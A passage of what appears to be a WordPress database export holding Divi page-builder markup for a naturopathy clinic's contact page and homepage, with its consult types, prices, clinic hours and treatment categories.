colorStart=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\"][et_pb_row _builder_version=\"4.9.4\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#a9804a\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h1><span style=\"color: #000000; font-family: \'Playfair Display\';\">Get in touch</span></h1>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact\" _builder_version=\"4.9.4\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\" hover_enabled=\"0\" sticky_enabled=\"0\" min_height=\"560px\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_margin=\"0px||||false|false\" custom_padding=\"0px||||false|false\" hover_enabled=\"0\" sticky_enabled=\"0\" min_height=\"665px\"][et_pb_column type=\"1_2\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" transform_translate=\"0px|-60px\" transform_translate_linked=\"off\" custom_padding=\"60px|30px|60px|30px|true|true\" hover_enabled=\"0\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" background_enable_image=\"off\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Submit\" _builder_version=\"4.9.4\" form_field_background_color=\"#FFFFFF\" form_field_text_color=\"#000000\" form_field_custom_margin=\"||30px||false|false\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"#FFFFFF\" button_border_width=\"2px\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" border_width_all=\"2px\" border_color_all=\"#000000\" sticky_enabled=\"0\" form_field_font=\"Montserrat||||||||\" button_bg_enable_color=\"on\" button_border_color=\"#000000\" form_field_background_color__hover_enabled=\"on|desktop\" global_colors_info=\"{%22gcid-7ab3d862-4d0b-45ee-8ae5-ad938d511761%22:%91%93}\" success_message=\"Thanks for contacting us. We will be in touch soon.\" email=\"hello@verdenaturopathy.com.au\" custom_message=\"Name: %%name%%||et_pb_line_break_holder||Email: %%email%%||et_pb_line_break_holder||Message: %%message%%\"][et_pb_contact_field field_id=\"name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" sticky_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" sticky_enabled=\"0\"][/et_pb_contact_field][et_pb_contact_field field_id=\"message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" sticky_enabled=\"0\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_padding=\"80px|50px|||false|false\" custom_padding_tablet=\"50px|0px|||false|false\" custom_padding_phone=\"\" custom_padding_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"-60px\" box_shadow_vertical=\"0px\" box_shadow_color=\"#ffffff\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"][/et_pb_text][et_pb_text _builder_version=\"4.9.4\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.8em\" hover_enabled=\"0\" inline_fonts=\"Montserrat,Playfair Display\" sticky_enabled=\"0\"]<h3><span style=\"color: #000000;\"><span style=\"font-family: \'Playfair Display\'; \">hello@verdenaturopathy.com.au</span><span style=\"font-family: \'Playfair Display\'; font-size: x-large;\"></span></span></h3>\n<span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\"></span></h3>\n<h3><span style=\"font-family: \'Playfair Display\'; font-size: x-large; color: #000000;\">Clinic hours:</span></h3>\n<h3><span style=\"font-family: Montserrat; font-size: large;\"><span style=\"font-family: Montserrat;\"></span><span style=\"font-family: Montserrat; color: #666666;\">Tues/Wed/Thurs: 9am-5pm</span>\n<span style=\"font-family: Montserrat; color: #666666;\">Alternate Saturdays: 9am-1pm</span></h3>\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"><strong></strong></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\"></span>\n\n<span style=\"font-family: \'Playfair Display\'; color: #000000; font-size: x-large;\">Clinic location:</span>\n\n<span style=\"font-family: Montserrat; font-size: large;\">Kalamunda (address given upon booking)</span><span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n<span style=\"font-family: Montserrat; font-size: large;\"></span>\n\n [/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"rgba(255,255,255,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" global_module=\"188\" saved_tabs=\"all\" locked=\"off\"][et_pb_row _builder_version=\"4.9.4\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" custom_margin=\"|||265px||\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"#ccd4c8\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\"><strong>Location</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"][/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" button_icon_color=\"#000000\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" hover_enabled=\"0\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\" button_bg_enable_color=\"on\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\"><strong>Clinic Hours</strong></span></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed/Thurs: 9-5pm</span><br /><span style=\"font-family: Montserrat;\">Alternate Saturdays: 9-1pm</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Contact','','inherit','closed','closed','','26-revision-v1','','','2021-05-26 20:38:09','2021-05-26 12:38:09','',26,'https://verde.desidrivers.com.au/?p=200',0,'revision','',0),(205,1,'2021-05-27 11:18:51','2021-05-27 03:18:51','https://verdenaturopathy.com.au/wp-content/uploads/2021/04/cropped-Standard-01-2.jpg','cropped-Standard-01-2.jpg','','inherit','open','closed','','cropped-standard-01-2-jpg','','','2021-05-27 11:18:51','2021-05-27 03:18:51','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/04/cropped-Standard-01-2.jpg',0,'attachment','image/jpeg',0),(207,1,'2021-05-27 12:04:21','2021-05-27 04:04:21','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; \">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; \">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; ;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px;font-family: Montserrat; \">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; \">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; \">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01-large.png\" title_text=\"1-01 (large)\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.4.8\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">Choose from face-to-face or Zoom consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (90 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" 